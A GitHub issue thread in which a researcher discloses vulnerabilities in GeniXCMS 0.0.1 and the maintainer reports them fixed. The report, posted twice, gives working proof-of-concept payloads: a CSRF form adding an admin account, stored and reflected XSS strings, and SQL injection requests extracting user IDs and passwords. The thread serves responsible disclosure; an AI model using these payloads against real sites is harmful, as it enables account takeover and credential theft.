### ISSUE TITLE
Multiple security issues [xss,sqli,csrf,]

### ISSUE THREAD

**Issue by liquidworm** [semplon/GeniXCMS#7]
Hi

Multiple vulnerabilities discovered in GeniXCMS 0.0.1.

Please respond to gjoko@zeroscience.mk for more details.

Thanks,
Gjoko

**Comment by semplon** [comment]
Hello, 

Thank You for your report, can You share it in here the vulnaribilities ? 

Many Thanks,

**Comment by liquidworm** [comment]
Hi,

Sure, here are the details:

1. CSRF Add Admin:

<html>
  <body>
    <form action="http://localhost/genixcms/gxadmin/index.php?page=users" method="POST">
      <input type="hidden" name="userid" value="Testingus" />
      <input type="hidden" name="pass1" value="123456" />
      <input type="hidden" name="pass2" value="123456" />
      <input type="hidden" name="email" value="test&#64;test&#46;tld" />
      <input type="hidden" name="group" value="0" />
      <input type="hidden" name="adduser" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

2. Stored XSS (param: cat):

<html>
  <body>
    <form action="http://localhost/genixcms/gxadmin/index.php?page=categories" method="POST">
      <input type="hidden" name="parent" value="2" />
      <input type="hidden" name="cat" value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;cookie&#41;&#59;&lt;&#47;script&gt;" />
      <input type="hidden" name="addcat" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

3. Reflected XSS (URL/page param):

http://localhost/genixcms/index.php?page=1<script>confirm("ZSL")</script>'

4. SQL Injection (params: username, page):

http://localhost/genixcms/index.php?page=1%27%20union+all+select+1,2,version%28%29,4,5,6,7,8,9,10%20and%20%27j%27=%27j

POST /genixcms/gxadmin/login.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 516
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Connection: Close

password=1&username=' and(select 1 from(select count(*),concat((select (select (select concat(0x27,0x7e,unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1&login=

-------

Thank You

**Comment by liquidworm** [comment]
Hi,

Sure, here are the details:

1. CSRF Add Admin:

<html>
  <body>
    <form action="http://localhost/genixcms/gxadmin/index.php?page=users"
method="POST">
      <input type="hidden" name="userid" value="Testingus" />
      <input type="hidden" name="pass1" value="123456" />
      <input type="hidden" name="pass2" value="123456" />
      <input type="hidden" name="email" value="test&#64;test&#46;tld" />
      <input type="hidden" name="group" value="0" />
      <input type="hidden" name="adduser" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

2. Stored XSS (param: cat):

<html>
  <body>
    <form action="
http://localhost/genixcms/gxadmin/index.php?page=categories" method="POST">
      <input type="hidden" name="parent" value="2" />
      <input type="hidden" name="cat"
value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;cookie&#41;&#59;&lt;&#47;script&gt;"
/>
      <input type="hidden" name="addcat" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

3. Reflected XSS (URL/page param):

http://localhost/genixcms/index.php?page=1<script>confirm("ZSL")</script>'

4. SQL Injection (params: username, page):

http://localhost/genixcms/index.php?page=1%27%20union+all+select+1,2,version%28%29,4,5,6,7,8,9,10%20and%20%27j%27=%27j

POST /genixcms/gxadmin/login.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 516
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727)
Connection: Close

password=1&username=' and(select 1 from(select count(*),concat((select
(select (select concat(0x27,0x7e,unhex(hex(cast(user.userid as
char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user
limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x
from `information_schema`.tables group by x)a) and '1'='1&login=

-------

Please inform me of scheduled patch release date.

Thank You


* Gjoko Krstic*
*Information Security Engineer*

*Zero Science Lab*
Macedonian Information Security Research & Development Laboratory
http://www.zeroscience.mk

+389 (0) 75 290 926
+389 (0) 77 670 886

**Comment by semplon** [comment]
Thank You for your share. I'm glad to know about this. Will be fixed soon.

**Comment by semplon** [comment]
Hi @liquidworm I want to inform you that the security fix had been done. Please download and try the master branch. 

thanks

**Comment by liquidworm** [comment]
Thank you for the update, will do.

Cheers.


* Gjoko Krstic*
*Information Security Engineer*

*Zero Science Lab*
Macedonian Information Security Research & Development Laboratory
http://www.zeroscience.mk

+389 (0) 75 290 926
+389 (0) 77 670 886
